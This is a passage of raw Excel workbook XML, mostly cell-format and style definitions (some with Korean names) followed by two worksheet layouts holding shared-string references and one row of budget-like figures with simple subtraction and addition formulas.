      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="16" fillId="0" borderId="13" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="16" fillId="0" borderId="17" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="16" fillId="0" borderId="20" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="16" fillId="0" borderId="27" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="16" fillId="0" borderId="18" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="16" fillId="0" borderId="34" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="41" fontId="16" fillId="0" borderId="18" xfId="50" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="41" fontId="16" fillId="0" borderId="25" xfId="50" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="17" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="29" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1">
      <alignment/>
    </xf>
    <xf numFmtId="0" fontId="18" fillId="34" borderId="35" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1" shrinkToFit="1"/>
    </xf>
    <xf numFmtId="0" fontId="18" fillId="34" borderId="36" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1" shrinkToFit="1"/>
    </xf>
    <xf numFmtId="0" fontId="18" fillId="34" borderId="37" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1" shrinkToFit="1"/>
    </xf>
    <xf numFmtId="0" fontId="18" fillId="34" borderId="38" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1" shrinkToFit="1"/>
    </xf>
    <xf numFmtId="0" fontId="18" fillId="34" borderId="37" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1" shrinkToFit="1"/>
    </xf>
    <xf numFmtId="0" fontId="18" fillId="34" borderId="39" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1" shrinkToFit="1"/>
    </xf>
    <xf numFmtId="3" fontId="16" fillId="0" borderId="40" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="right" vertical="center" shrinkToFit="1"/>
    </xf>
    <xf numFmtId="178" fontId="16" fillId="0" borderId="41" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="right" vertical="center" shrinkToFit="1"/>
    </xf>
    <xf numFmtId="3" fontId="16" fillId="0" borderId="34" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="right" vertical="center" shrinkToFit="1"/>
    </xf>
    <xf numFmtId="0" fontId="16" fillId="0" borderId="42" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center" shrinkToFit="1"/>
    </xf>
    <xf numFmtId="0" fontId="16" fillId="0" borderId="43" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="16" fillId="0" borderId="44" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1" shrinkToFit="1"/>
    </xf>
    <xf numFmtId="3" fontId="16" fillId="0" borderId="44" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="right" vertical="center" shrinkToFit="1"/>
    </xf>
    <xf numFmtId="0" fontId="16" fillId="0" borderId="45" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1" shrinkToFit="1"/>
    </xf>
    <xf numFmtId="3" fontId="16" fillId="0" borderId="46" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="right" vertical="center" shrinkToFit="1"/>
    </xf>
    <xf numFmtId="178" fontId="16" fillId="0" borderId="47" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="right" vertical="center" shrinkToFit="1"/>
    </xf>
    <xf numFmtId="3" fontId="18" fillId="0" borderId="48" xfId="0" applyNumberFormat="1" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="right" vertical="center" wrapText="1" shrinkToFit="1"/>
    </xf>
    <xf numFmtId="0" fontId="15" fillId="0" borderId="0" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" shrinkToFit="1"/>
    </xf>
    <xf numFmtId="178" fontId="15" fillId="0" borderId="0" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="right" vertical="center" shrinkToFit="1"/>
    </xf>
    <xf numFmtId="178" fontId="18" fillId="0" borderId="49" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="right" vertical="center" shrinkToFit="1"/>
    </xf>
    <xf numFmtId="0" fontId="18" fillId="34" borderId="29" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="28" fillId="34" borderId="29" xfId="0" applyFont="1" applyFill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 shrinkToFit="1"/>
    </xf>
    <xf numFmtId="0" fontId="16" fillId="0" borderId="32" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" shrinkToFit="1"/>
    </xf>
    <xf numFmtId="0" fontId="16" fillId="0" borderId="23" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" shrinkToFit="1"/>
    </xf>
    <xf numFmtId="178" fontId="15" fillId="0" borderId="20" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="right" vertical="center" shrinkToFit="1"/>
    </xf>
    <xf numFmtId="178" fontId="15" fillId="0" borderId="19" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="right" vertical="center" shrinkToFit="1"/>
    </xf>
    <xf numFmtId="3" fontId="18" fillId="0" borderId="17" xfId="50" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="right" vertical="center" shrinkToFit="1"/>
    </xf>
    <xf numFmtId="178" fontId="18" fillId="0" borderId="17" xfId="50" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="right" vertical="center" shrinkToFit="1"/>
    </xf>
    <xf numFmtId="178" fontId="18" fillId="0" borderId="26" xfId="50" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="right" vertical="center" shrinkToFit="1"/>
    </xf>
    <xf numFmtId="41" fontId="18" fillId="0" borderId="48" xfId="50" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="178" fontId="18" fillId="0" borderId="48" xfId="50" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="16" fillId="0" borderId="50" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="18" fillId="0" borderId="51" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" shrinkToFit="1"/>
    </xf>
    <xf numFmtId="3" fontId="18" fillId="0" borderId="48" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="right" vertical="center" shrinkToFit="1"/>
    </xf>
    <xf numFmtId="0" fontId="17" fillId="0" borderId="31" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="3" fontId="17" fillId="0" borderId="17" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="right" vertical="center" shrinkToFit="1"/>
    </xf>
    <xf numFmtId="178" fontId="17" fillId="0" borderId="17" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="right" vertical="center" shrinkToFit="1"/>
    </xf>
    <xf numFmtId="178" fontId="17" fillId="0" borderId="26" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="right" vertical="center" shrinkToFit="1"/>
    </xf>
    <xf numFmtId="0" fontId="25" fillId="0" borderId="0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7" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1">
      <alignment horizontal="center"/>
    </xf>
    <xf numFmtId="0" fontId="16" fillId="0" borderId="18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16" fillId="0" borderId="27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52" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="15" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1">
      <alignment horizontal="left" wrapText="1"/>
    </xf>
    <xf numFmtId="176" fontId="18" fillId="34" borderId="53" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" shrinkToFit="1"/>
    </xf>
    <xf numFmtId="176" fontId="18" fillId="34" borderId="54" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" shrinkToFit="1"/>
    </xf>
    <xf numFmtId="176" fontId="18" fillId="34" borderId="41" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" shrinkToFit="1"/>
    </xf>
    <xf numFmtId="0" fontId="16" fillId="0" borderId="27" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="16" fillId="0" borderId="11" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="16" fillId="0" borderId="11" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="16" fillId="0" borderId="55" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="18" fillId="0" borderId="56" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="18" fillId="0" borderId="57" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="18" fillId="34" borderId="53" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="18" fillId="34" borderId="54" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="18" fillId="34" borderId="37" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="18" fillId="34" borderId="44" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="18" fillId="34" borderId="36" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="18" fillId="34" borderId="17" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="18" fillId="34" borderId="54" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="18" fillId="34" borderId="20" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="18" fillId="34" borderId="41" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="18" fillId="34" borderId="21" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="16" fillId="0" borderId="58" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center" wrapText="1" shrinkToFit="1"/>
    </xf>
    <xf numFmtId="0" fontId="16" fillId="0" borderId="59" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center" wrapText="1" shrinkToFit="1"/>
    </xf>
    <xf numFmtId="0" fontId="18" fillId="0" borderId="56" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1" shrinkToFit="1"/>
    </xf>
    <xf numFmtId="0" fontId="18" fillId="0" borderId="57" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1" shrinkToFit="1"/>
    </xf>
    <xf numFmtId="0" fontId="18" fillId="0" borderId="60" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1" shrinkToFit="1"/>
    </xf>
    <xf numFmtId="0" fontId="16" fillId="0" borderId="27" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center" wrapText="1" shrinkToFit="1"/>
    </xf>
    <xf numFmtId="0" fontId="16" fillId="0" borderId="11" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center" wrapText="1" shrinkToFit="1"/>
    </xf>
    <xf numFmtId="0" fontId="16" fillId="0" borderId="52" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center" wrapText="1" shrinkToFit="1"/>
    </xf>
    <xf numFmtId="0" fontId="16" fillId="0" borderId="34" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center" wrapText="1" shrinkToFit="1"/>
    </xf>
    <xf numFmtId="0" fontId="16" fillId="0" borderId="61" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center" wrapText="1" shrinkToFit="1"/>
    </xf>
    <xf numFmtId="0" fontId="16" fillId="0" borderId="62" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center" wrapText="1" shrinkToFit="1"/>
    </xf>
    <xf numFmtId="0" fontId="16" fillId="0" borderId="63" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center" wrapText="1" shrinkToFit="1"/>
    </xf>
    <xf numFmtId="0" fontId="14" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="16" fillId="0" borderId="64" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="right"/>
    </xf>
    <xf numFmtId="0" fontId="18" fillId="34" borderId="65" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1" shrinkToFit="1"/>
    </xf>
    <xf numFmtId="0" fontId="18" fillId="34" borderId="10" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1" shrinkToFit="1"/>
    </xf>
    <xf numFmtId="0" fontId="18" fillId="34" borderId="66" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1" shrinkToFit="1"/>
    </xf>
    <xf numFmtId="0" fontId="16" fillId="0" borderId="67" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center" wrapText="1" shrinkToFit="1"/>
    </xf>
    <xf numFmtId="0" fontId="16" fillId="0" borderId="68" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center" wrapText="1" shrinkToFit="1"/>
    </xf>
    <xf numFmtId="0" fontId="18" fillId="34" borderId="53" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="18" fillId="34" borderId="28" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="16" fillId="0" borderId="54" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="18" fillId="34" borderId="30" xfId="0" applyFont="1" applyFill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69" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="17" fillId="34" borderId="53" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="17" fillId="34" borderId="28" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="17" fillId="34" borderId="37" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="17" fillId="34" borderId="45" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="17" fillId="34" borderId="40" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="17" fillId="34" borderId="68" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="17" fillId="34" borderId="70" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="17" fillId="34" borderId="41" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="17" fillId="34" borderId="30" xfId="0" applyFont="1" applyFill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</cellXfs>
  <cellStyles count="66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뷭?_BOOKSHIP" xfId="45"/>
    <cellStyle name="설명 텍스트" xfId="46"/>
    <cellStyle name="셀 확인" xfId="47"/>
    <cellStyle name="Comma" xfId="48"/>
    <cellStyle name="Comma [0]" xfId="49"/>
    <cellStyle name="쉼표 [0] 2" xfId="50"/>
    <cellStyle name="연결된 셀" xfId="51"/>
    <cellStyle name="Followed Hyperlink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출력" xfId="61"/>
    <cellStyle name="콤마 [0]_1202" xfId="62"/>
    <cellStyle name="콤마_1202" xfId="63"/>
    <cellStyle name="Currency" xfId="64"/>
    <cellStyle name="Currency [0]" xfId="65"/>
    <cellStyle name="표준_kc-elec system check list" xfId="66"/>
    <cellStyle name="Hyperlink" xfId="67"/>
    <cellStyle name="AeE­ [0]_INQUIRY ¿μ¾÷AßAø " xfId="68"/>
    <cellStyle name="AeE­_INQUIRY ¿μ¾÷AßAø " xfId="69"/>
    <cellStyle name="AÞ¸¶ [0]_INQUIRY ¿μ¾÷AßAø " xfId="70"/>
    <cellStyle name="AÞ¸¶_INQUIRY ¿μ¾÷AßAø " xfId="71"/>
    <cellStyle name="C￥AØ_¿μ¾÷CoE² " xfId="72"/>
    <cellStyle name="Comma [0]_ SG&amp;A Bridge " xfId="73"/>
    <cellStyle name="Comma_ SG&amp;A Bridge " xfId="74"/>
    <cellStyle name="Currency [0]_ SG&amp;A Bridge " xfId="75"/>
    <cellStyle name="Currency_ SG&amp;A Bridge " xfId="76"/>
    <cellStyle name="Header1" xfId="77"/>
    <cellStyle name="Header2" xfId="78"/>
    <cellStyle name="Normal_ SG&amp;A Bridge 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view="pageBreakPreview" zoomScaleSheetLayoutView="100" zoomScalePageLayoutView="0" workbookViewId="0" topLeftCell="A1">
      <selection activeCell="G2" sqref="G2"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultColWidth="8.88671875" defaultRowHeight="13.5"/>
  <sheetData>
    <row r="1" spans="1:14" s="42" customFormat="1" ht="30" customHeight="1">
      <c r="A1" s="43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4" s="42" customFormat="1" ht="30" customHeight="1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1:14" s="42" customFormat="1" ht="49.5" customHeight="1">
      <c r="A3" s="43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</row>
    <row r="4" spans="1:14" s="42" customFormat="1" ht="37.5" customHeight="1">
      <c r="A4" s="138" t="s">
        <v>144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</row>
    <row r="5" spans="1:14" s="45" customFormat="1" ht="49.5" customHeight="1">
      <c r="A5" s="46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</row>
    <row r="6" spans="1:14" s="42" customFormat="1" ht="30" customHeight="1">
      <c r="A6" s="43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</row>
    <row r="7" spans="1:14" s="42" customFormat="1" ht="30" customHeight="1">
      <c r="A7" s="43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</row>
    <row r="8" spans="1:14" s="42" customFormat="1" ht="30" customHeight="1">
      <c r="A8" s="43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</row>
    <row r="9" spans="1:14" s="42" customFormat="1" ht="30" customHeight="1">
      <c r="A9" s="43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</row>
    <row r="10" spans="1:14" s="42" customFormat="1" ht="30" customHeight="1">
      <c r="A10" s="43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</row>
    <row r="11" spans="1:14" s="42" customFormat="1" ht="30" customHeight="1">
      <c r="A11" s="43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</row>
    <row r="12" spans="1:14" s="42" customFormat="1" ht="30" customHeight="1">
      <c r="A12" s="137" t="s">
        <v>66</v>
      </c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</row>
    <row r="13" spans="1:14" s="42" customFormat="1" ht="30" customHeight="1">
      <c r="A13" s="43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</row>
    <row r="14" spans="1:14" s="42" customFormat="1" ht="30" customHeight="1">
      <c r="A14" s="43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</row>
  </sheetData>
  <sheetProtection selectLockedCells="1" selectUnlockedCells="1"/>
  <mergeCells count="2">
    <mergeCell ref="A4:N4"/>
    <mergeCell ref="A12:N12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24"/>
  <sheetViews>
    <sheetView view="pageBreakPreview" zoomScaleSheetLayoutView="100" zoomScalePageLayoutView="0" workbookViewId="0" topLeftCell="A1">
      <selection activeCell="A3" sqref="A3"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultColWidth="8.88671875" defaultRowHeight="13.5"/>
  <cols>
    <col min="1" max="1" width="8.4453125" style="14" customWidth="1"/>
    <col min="2" max="2" width="20.10546875" style="14" customWidth="1"/>
    <col min="3" max="3" width="15.77734375" style="14" customWidth="1"/>
    <col min="4" max="4" width="14.10546875" style="14" customWidth="1"/>
    <col min="5" max="5" width="15.77734375" style="14" customWidth="1"/>
    <col min="6" max="6" width="17.77734375" style="14" customWidth="1"/>
    <col min="7" max="7" width="15.10546875" style="14" customWidth="1"/>
    <col min="8" max="8" width="6.5546875" style="14" hidden="1" customWidth="1"/>
    <col min="9" max="16384" width="8.88671875" style="14" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="2" spans="1:7" ht="37.5" customHeight="1">
      <c r="A2" s="139" t="s">
        <v>144</v>
      </c>
      <c r="B2" s="139"/>
      <c r="C2" s="139"/>
      <c r="D2" s="139"/>
      <c r="E2" s="139"/>
      <c r="F2" s="139"/>
      <c r="G2" s="139"/>
    </row>
    <row r="3" ht="6.75" customHeight="1"/>
    <row r="4" spans="1:3" ht="22.5" customHeight="1">
      <c r="A4" s="143" t="s">
        <v>45</v>
      </c>
      <c r="B4" s="143"/>
      <c r="C4" s="143"/>
    </row>
    <row r="5" ht="6.75" customHeight="1"/>
    <row r="6" ht="22.5" customHeight="1">
      <c r="A6" s="15" t="s">
        <v>53</v>
      </c>
    </row>
    <row r="7" s="16" customFormat="1" ht="19.5" customHeight="1">
      <c r="B7" s="16" t="s">
        <v>54</v>
      </c>
    </row>
    <row r="8" s="16" customFormat="1" ht="19.5" customHeight="1">
      <c r="B8" s="16" t="s">
        <v>55</v>
      </c>
    </row>
    <row r="9" s="16" customFormat="1" ht="19.5" customHeight="1">
      <c r="B9" s="16" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="10" ht="6.75" customHeight="1"/>
    <row r="11" ht="22.5" customHeight="1">
      <c r="A11" s="15" t="s">
        <v>21</v>
      </c>
    </row>
    <row r="12" spans="2:7" s="16" customFormat="1" ht="35.25" customHeight="1">
      <c r="B12" s="147" t="s">
        <v>68</v>
      </c>
      <c r="C12" s="147"/>
      <c r="D12" s="147"/>
      <c r="E12" s="147"/>
      <c r="F12" s="147"/>
      <c r="G12" s="147"/>
    </row>
    <row r="13" s="16" customFormat="1" ht="22.5" customHeight="1">
      <c r="B13" s="16" t="s">
        <v>67</v>
      </c>
    </row>
    <row r="14" s="16" customFormat="1" ht="19.5" customHeight="1">
      <c r="B14" s="16" t="s">
        <v>57</v>
      </c>
    </row>
    <row r="15" s="16" customFormat="1" ht="6.75" customHeight="1"/>
    <row r="16" ht="23.25" customHeight="1">
      <c r="A16" s="15" t="s">
        <v>22</v>
      </c>
    </row>
    <row r="17" ht="19.5" customHeight="1">
      <c r="B17" s="16" t="s">
        <v>46</v>
      </c>
    </row>
    <row r="18" spans="2:7" ht="16.5">
      <c r="B18" s="16"/>
      <c r="G18" s="38" t="s">
        <v>69</v>
      </c>
    </row>
    <row r="19" spans="2:8" ht="23.25" customHeight="1">
      <c r="B19" s="142" t="s">
        <v>62</v>
      </c>
      <c r="C19" s="144" t="s">
        <v>64</v>
      </c>
      <c r="D19" s="145"/>
      <c r="E19" s="146"/>
      <c r="F19" s="142" t="s">
        <v>65</v>
      </c>
      <c r="G19" s="140" t="s">
        <v>47</v>
      </c>
      <c r="H19" s="17"/>
    </row>
    <row r="20" spans="2:8" ht="23.25" customHeight="1">
      <c r="B20" s="141"/>
      <c r="C20" s="18" t="s">
        <v>18</v>
      </c>
      <c r="D20" s="18" t="s">
        <v>19</v>
      </c>
      <c r="E20" s="18" t="s">
        <v>20</v>
      </c>
      <c r="F20" s="141"/>
      <c r="G20" s="141"/>
      <c r="H20" s="17"/>
    </row>
    <row r="21" spans="2:8" ht="23.25" customHeight="1">
      <c r="B21" s="20">
        <v>301950</v>
      </c>
      <c r="C21" s="20">
        <v>9000</v>
      </c>
      <c r="D21" s="20">
        <v>9000</v>
      </c>
      <c r="E21" s="19">
        <f>C21-D21</f>
        <v>0</v>
      </c>
      <c r="F21" s="20">
        <f>B21+E21</f>
        <v>301950</v>
      </c>
      <c r="G21" s="18"/>
      <c r="H21" s="17"/>
    </row>
    <row r="22" ht="23.25" customHeight="1">
      <c r="B22" s="16" t="s">
        <v>58</v>
      </c>
    </row>
    <row r="23" ht="19.5" customHeight="1">
      <c r="B23" s="16" t="s">
        <v>59</v>
      </c>
    </row>
    <row r="24" ht="19.5" customHeight="1">
      <c r="B24" s="16" t="s">
        <v>60</v>
      </c>
    </row>
    <row r="25" ht="15" customHeight="1"/>
  </sheetData>
  <sheetProtection/>
  <mergeCells count="7">
    <mergeCell ref="A2:G2"/>
    <mergeCell ref="G19:G20"/>
    <mergeCell ref="B19:B20"/>
    <mergeCell ref="A4:C4"/>
    <mergeCell ref="C19:E19"/>
    <mergeCell ref="F19:F20"/>
    <mergeCell ref="B12:G12"/>
  </mergeCells>
  <printOptions/>
